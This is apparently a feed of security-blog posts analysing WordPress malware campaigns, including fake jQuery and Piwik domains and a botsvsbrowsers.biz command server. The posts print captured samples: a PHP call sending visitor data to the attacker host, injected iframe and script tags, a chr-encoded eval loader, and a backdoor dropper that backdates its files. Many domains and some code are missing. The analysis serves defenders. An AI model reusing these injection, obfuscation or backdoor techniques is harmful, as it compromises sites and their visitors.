bookmark_borderRevSlider MalFrames – SoakSoak

The RevSlider SoakSoak malware campaign started with the domain (hence the name). However, since thelast 2 weeks, it has mutated and used different domains as the initial malware intermediary.

This is the full list so far:

  1. First one in the list. We identified more than 100,000 sites redirecting to it.
  2. Started just after soaksoak, leveraging the /collect.js redirection. Almost 10,000 were blacklisted and compromised with it.
  4. Second biggest campaign after soaksoak. More than 50,000 sites compromised and still going.
  6. Current one active. Also leverages the /collect.js redirection and has compromised more than 11,000 different sites.

We will keep updating this list as the domains change and the attacks mutate.

bookmark_borderFake botsvsbrowsers domain

The domain is quite popular and used for comparing user agents (browsers) and seeingif a specific request is from a valid user or a bot.

And piggy backing on their popularity, the bad guys created a domain (.biz versus .com) tobe used as a command and control server on spam SEO campaigns.

This is the code we are seeing on compromised sites:

echo file_get_contents(“http://botsvsbrowsers. biz/Statistic/ Stat.php?ip=’. urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=”.urlencode($sUserAgent)…

Which basically contacts on every page load, giving the client IP address, and URLand it decides what to inject to that user. Most of the time we are seeing just plain SPAM, but they are probably servingother malicious code as well.

So if you see any content being loaded from botsvsbrowsers.BIZ (or the IP address, you know it is malicious. blacklisted by Google

We woke up this morning to many reports and people asking why the site is being blacklisted.We did not get a chance to analyze it while it was compromised, but it seems that one of their javascript files ( was modified to inject a malicious iframefrom

That’s the supposed bad code:

It seems the PHP team fixed it already and requested Google to clear it. If anyone has more info, we would love to hear it.

bookmark_borderDo you still look for base64_decode?

A common keyword that people use to find hidden injections on web sites is base64_decode. Youoften see injections that look like eval ( base64_decode or eval ( gzinflate ( base64_decode beingused by the attackers.

So most web security tools have some signatures to look for it (specially on WordPress).

Well, the attackers do know about it as well and we are starting to see some interesting variations for it. Forexample, instead of injecting base64_decode, they are injecting as a variable:


And instead of calling out base64_decode directly, they are using base + 32*2 + decode. A simple trick that allowsthen to bypass many security filters.

bookmark_borderFake piwik domain – piwik-stat

Piwik is an open source web analytics software that is used by many web masters. Andthe bad guys are using their popularity to try to make their malware injection harder todetect. They do that by injecting malicious javascript calls from a domain that looks like came from the Piwik project: This is what is being injected:

<script src="httx://www.piwik-stat. com/piwik.js..
<iframe src="httx://www.piwik-stat. com/index.html..

It is not an uncommon tactic (we see if often with jquery), but as a web master if you see anythingfrom pwiki-stat or similar variations, it is likely fake. The official (and trusted one)is

bookmark_borderContinuing injections from *

I don\’t think we have logged about it lately, but an old infection (that started early this year)is still going strong. The result is this code being injected to the site when visited by certain browsers:

var j=0; while(j<230) 
.charCodeAt( j++)-1));

And the hidden code that generates it is tricky to find and generlly hidden inside one of the themefiles or wp-includes (on WordPress sites). It looks like this:

function check_image_c()
        $imagepath = array (
  0 => "47 118 97 114 47 119 119 119 47 116 104 111 117 103 104 116 102 117 108 119 111 109 101 110 46',
  1 => "111 114 103 47 119 112 45 99 111 110 116 101 110 116 47 117 112 108 111 97 100 115 47 50 48',
  2 => "49 51 47 48 51 47 117 112 97 110 100 117 112 46 106 112 103',
        $image = "101 118 97 108 40 98 97 115 101 54 52 95 100 101 99 111 100 101 40 39";
        $image = implode("", array_map("chr", explode(" ", $image)));
        $a = 'pre" . 'g_replace';
        $a("/.*/e", $image . $code . "'));", "");
                return false;

All that to the end goal: Inject an iframe from * (and other free domains) that will redirect the browser of the victim to Fake AV.

bookmark_borderBackdoor Injector code

A backdoor injector code we found on a compromised site:

        file_put_contentz($dir.'/wp-includes/page.php', get_contentz(''));
        touch($dir.'/wp-includes/page.php', $time);

        file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz(''));
        touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time);

        file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz(''));
        touch($dir.'/wp-admin/options-plugin.php', $time);

        file_put_contentz($dir.'/wp-plugin.php', get_contentz(''));
        touch($dir.'/wp-plugin.php', $time);

        file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz(''));
        touch($dir.'/wp-content/themes/theme.php', $time);

        file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz(''));
        touch($dir.'/wp-content/uploads/timthumb.php', $time);

It looks for a writable directly either inside wp-includes, wp-content or inside uploads to inject a backdoor.

bookmark_borderLarge scale TDS redirections

Lots of compromised sites redirecting to TDS:

And that’s just a small sample. We have detected just in February over 500 sites compromised exactly like that.

bookmark_borderMore Fake jQuery sites –

We keep seeing fake jQuery sites popping up and being used to distributemalware. One was, other was and the new oneis (

And this new one seems to be affecting many web sites in the last few days. All of them have the following on their header or index.php files: = "httx://"

Which redirects any visitor to the web site to where it is then sent to other random spammy domains (seems like a TDS is in place).

Update:We are also seeing some sites with this javascript file being included:, which just redirects back to via the same in javascript.

*Note that the domain was just registered (20-nov-2012), so it is not being flagged anywhere.

**The official jquery sites are or Other variations are likely fake.